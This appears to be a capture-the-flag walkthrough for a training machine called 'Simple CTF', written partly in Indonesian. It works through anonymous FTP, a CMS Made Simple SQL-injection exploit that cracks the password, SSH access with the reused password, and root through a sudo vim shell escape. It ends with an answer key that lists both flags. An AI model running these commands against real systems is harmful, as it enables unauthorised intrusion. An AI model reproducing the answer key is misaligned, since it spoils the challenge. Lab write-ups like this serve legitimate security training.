Writeup Aria
challengesB2rEasy

Simple CTF

Beginner level ctf

solution

enumeration

nmap -sV -T4 10.49.147.244
# PORT     STATE SERVICE VERSION
# 21/tcp   open  ftp     vsftpd 3.0.3
# 80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
# 2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
# Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

check ftp anonymous login

ftp 10.49.147.244
# user: Anonymous

ls
# pub
cd pub
ls
# ForMitch.txt
get ForMitch.txt
exit

cat ForMitch.txt
# Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

exploit ssh

searchsploit Apache httpd 2.4.18
searchsploit OpenSSH 7.2p2
# ---------------------------------------------------------------------- ---------------------------------
#  Exploit Title                                                        |  Path
# ---------------------------------------------------------------------- ---------------------------------
# OpenSSH 2.3 < 7.7 - Username Enumeration                              | linux/remote/45233.py
# OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                        | linux/remote/45210.py
# OpenSSH 7.2 - Denial of Service                                       | linux/dos/40888.py
# OpenSSH 7.2p2 - Username Enumeration                                  | linux/remote/40136.py
# OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Doma | linux/local/40962.txt
# OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading              | linux/remote/40963.txt
# OpenSSH < 7.7 - User Enumeration (2)                                  | linux/remote/45939.py
# OpenSSHd 7.2p2 - Username Enumeration                                 | linux/remote/40113.txt
# ---------------------------------------------------------------------- ---------------------------------

kita gunakan exploit OpenSSH 7.2p2 - Username Enumeration

locate linux/remote/40136.py
# /opt/exploitdb/exploits/linux/remote/40136.py
# /opt/searchsploit/exploits/linux/remote/40136.py
python3 /opt/searchsploit/exploits/linux/remote/40136.py -h

python3 /opt/searchsploit/exploits/linux/remote/40136.py 10.49.147.244:2222 -U /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
# error library jadi sip deh

test http page, and gobuster

gobuster dir -u http://10.49.147.244 -w /usr/share/wordlists/dirb/common.txt
# robots.txt           (Status: 200) [Size: 929]
# simple               (Status: 301) [Size: 315]

1768152485710

1768152501575

This site is powered by CMS Made Simple version 2.2.8

exploit CMS made simple

searchsploit CMS Made Simple 2.2.8
# CMS Made Simple < 2.2.10 - SQL Injection                              | php/webapps/46635.py

locate  php/webapps/46635.py
# /opt/exploitdb/exploits/php/webapps/46635.py
# /opt/searchsploit/exploits/php/webapps/46635.py

pip install termcolor
python /opt/searchsploit/exploits/php/webapps/46635.py -h
#  -h, --help            show this help message and exit
#   -u URL, --url=URL     Base target uri (ex. http://10.10.10.100/cms)
#   -w WORDLIST, --wordlist=WORDLIST
                        # Wordlist for crack admin password
#   -c, --crack           Crack password with wordlist

python /opt/searchsploit/exploits/php/webapps/46635.py -u http://10.49.147.244/simple -w /usr/share/wordlists/rockyou.txt -c
# [+] Salt for password found: 1dac0d92e9fa6bb2
# [+] Username found: mitch
# [+] Email found: admin@admin.com
# [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
# [+] Password cracked: secret

login to cms

go to http://10.49.147.244/simple/admin/login.php, login with username: mitch and password: secret

go to file manager, and upload reverse shell php file 1768152896117

nc -lvnp 9001

namun gw coba tidak berhasil ke upload filenya jadi saya skip di cms nya.

access ssh

ssh -p 2222 mitch@10.49.147.244
# password: secret

ls
# user.txt
cat user.txt
# G00d j0b, keep up!

privesc

ls -la /home/
# drwxr-x---  3 mitch   mitch   4096 aug 19  2019 mitch
# drwxr-x--- 16 sunbath sunbath 4096 aug 19  2019 sunbath

sudo -l
# User mitch may run the following commands on Machine:
    # (root) NOPASSWD: /usr/bin/vim

kita bisa jalankan vim sebagai root tanpa password

sudo vim -c ':!/bin/sh'
whoami
# root
cat /root/root.txt
# W3ll d0n3. You made it!

Answer

Start Machine

  • How many services are running under port 1000?

2

  • What is running on the higher port?

ssh

  • What's the CVE you're using against the application?

CVE-2019-9053

  • To what kind of vulnerability is the application vulnerable?

sqli

  • What's the password?

secret

  • Where can you login with the details obtained?

ssh

  • What's the user flag?

G00d j0b, keep up!

  • Is there any other user in the home directory? What's its name?

sunbath

  • What can you leverage to spawn a privileged shell?

vim

  • What's the root flag?

W3ll d0n3. You made it!

RootMe

Previous Page

Agent Sudo

Next Page

On this page

solutionenumerationcheck ftp anonymous loginexploit sshtest http page, and gobusterexploit CMS made simplelogin to cmsaccess sshprivescAnswerStart Machine